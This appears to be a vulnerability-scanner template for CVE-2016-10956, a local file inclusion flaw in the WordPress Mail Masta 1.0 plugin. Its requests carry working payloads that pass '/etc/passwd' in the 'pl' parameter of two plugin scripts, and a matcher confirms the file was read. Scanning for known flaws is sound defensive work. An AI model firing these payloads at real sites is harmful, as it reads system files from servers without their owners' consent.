id: CVE-2016-10956 info: name: WordPress Mail Masta 1.0 - Local File Inclusion author: daffainfo,0x240x23elu severity: high description: WordPress Mail Masta 1.0 is susceptible to local file inclusion in count_of_send.php and csvexport.php. reference: - https://cxsecurity.com/issue/WLB-2016080220 - https://wpvulndb.com/vulnerabilities/8609 - https://wordpress.org/plugins/mail-masta/#developers - https://nvd.nist.gov/vuln/detail/CVE-2016-10956 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2016-10956 cwe-id: CWE-20 tags: cve,cve2016,wordpress,wp-plugin,lfi,mail requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd" - "{{BaseURL}}/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd" matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" part: body - type: status status: - 200 - 500 # Enhanced by mp on 2022/06/09